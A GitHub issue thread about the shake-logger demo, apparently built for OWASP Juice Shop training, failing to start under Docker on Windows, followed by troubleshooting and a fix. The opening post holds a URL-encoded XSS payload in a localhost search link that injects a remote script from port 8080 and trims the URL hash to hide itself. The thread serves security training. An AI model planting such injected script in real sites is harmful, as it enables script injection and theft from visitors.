### ISSUE TITLE
Shake logger fails to start

### ISSUE THREAD

**Issue by bkimminich** [wurstbrot/shake-logger#4]
I am using Docker Desktop on Windows 10, cloned the repo and ran `docker-compose up` which yielded the following output:

![image](https://user-images.githubusercontent.com/3531020/58496027-47f86d80-8179-11e9-81d3-329f5a66e940.png)

When visiting the link <http://localhost:3000/#/search?q=%3Cimg+src%3Dx+onerror%3D%27var+js%3Ddocument.createElement%28%22script%22%29%3Bjs.type+%3D+%22text%2Fjavascript%22%3Bjs.src%3D%22http%3A%2F%2Flocalhost%3A8080%2Fshake.js%22%3Bdocument.body.appendChild%28js%29%3Bvar+hash%3Dwindow.location.hash%3Bwindow.location.hash%3Dhash.substr%280%2C8%29%3B%27%2F%3Eapple> neither jiggling nor music happen. The logger is also not responding at port 8080.

**Comment by wurstbrot** [comment]
Tested.
Works in firefox.
Does not work in chrome.

**Comment by wurstbrot** [comment]
That is new. Right now, only linux is supported.
In case you just want the jingle and not the logger, you can mount shake.*.
Should I prepare a _Dockerfile_ for that?
We might take a look at it when we see us in person?

**Comment by bkimminich** [comment]
It's not super important, but if it's only working on Linux maybe add that info to the README? I'd temporarily remove reference of the demo from the Juice Shop README and extend the trainer's guide in the ebook instead.

**Comment by wurstbrot** [comment]
fixed, @bkimminich confirmed it on his computer.

**Comment by bkimminich** [comment]
I just wanted to confirm that the shake and logger part both work fine also on native Docker for Windows! 🏅
